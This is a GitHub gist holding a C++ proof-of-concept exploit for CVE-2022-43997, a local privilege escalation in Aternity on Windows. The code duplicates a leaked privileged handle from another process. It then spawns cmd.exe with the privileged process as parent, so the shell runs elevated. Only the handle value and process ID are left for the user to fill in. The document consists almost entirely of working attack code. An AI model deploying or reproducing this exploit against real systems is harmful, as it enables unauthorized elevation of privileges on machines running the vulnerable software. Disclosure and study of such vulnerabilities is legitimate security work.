Skip to content

Instantly share code, notes, and snippets.

@jackullrich
Created January 23, 2023 21:51
Show Gist options
  • Save jackullrich/21fcfe75aeb5e18c60b80e684b83d741 to your computer and use it in GitHub Desktop.
Save jackullrich/21fcfe75aeb5e18c60b80e684b83d741 to your computer and use it in GitHub Desktop.
CVE-2022-43997
#include <memory>
#include <Windows.h>
bool CreateProcessWithParent(HANDLE hProcess, PWSTR commandline)
{
SIZE_T size = 0;
bool result = false;
STARTUPINFOEX si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
if (InitializeProcThreadAttributeList(nullptr, 1, 0, &size))
{
auto buffer = std::make_unique<BYTE[]>(size);
if (buffer != nullptr)
{
auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get());
if (InitializeProcThreadAttributeList(attributes, 1, 0, &size))
{
if (UpdateProcThreadAttribute(attributes, 0,
PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
&hProcess, sizeof(hProcess), nullptr, nullptr))
{
si.lpAttributeList = attributes;
result = CreateProcessW(nullptr, commandline, nullptr, nullptr,
FALSE, EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr,
(STARTUPINFO*)&si, &pi);
if (result)
{
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
CloseHandle(hProcess);
DeleteProcThreadAttributeList(attributes);
}
}
}
}
return result;
}
bool DuplicateAternityHandle(HANDLE hHandleValue, DWORD dwProcessId, PHANDLE hClonedHandle)
{
bool result = false;
HANDLE hLocalClone = INVALID_HANDLE_VALUE;
HANDLE hOwnerProcess = INVALID_HANDLE_VALUE;
hOwnerProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);
if (hOwnerProcess != nullptr)
{
if (DuplicateHandle(hOwnerProcess, hHandleValue, GetCurrentProcess(), &hLocalClone, 0, FALSE, DUPLICATE_SAME_ACCESS))
{
result = true;
}
CloseHandle(hOwnerProcess);
}
*hClonedHandle = hLocalClone;
return result;
}
int main(void)
{
//
// <!--- Replace these values (handle, dwProcessId) --->
// These can be obtained by calling NtQuerySystemInformation as well
//
// This is the A180AG.exe handle value from the medium IL process
//
HANDLE handle = INVALID_HANDLE_VALUE;
//
// This is the process id of the medium IL process
//
DWORD dwProcessId = 123456;
// Application we want to start
wchar_t commandLine[1024] = L"C:\\Windows\\System32\\cmd.exe";
HANDLE hClonedHandle = INVALID_HANDLE_VALUE;
if (DuplicateAternityHandle(handle, dwProcessId, &hClonedHandle))
{
CreateProcessWithParent(hClonedHandle, commandLine);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment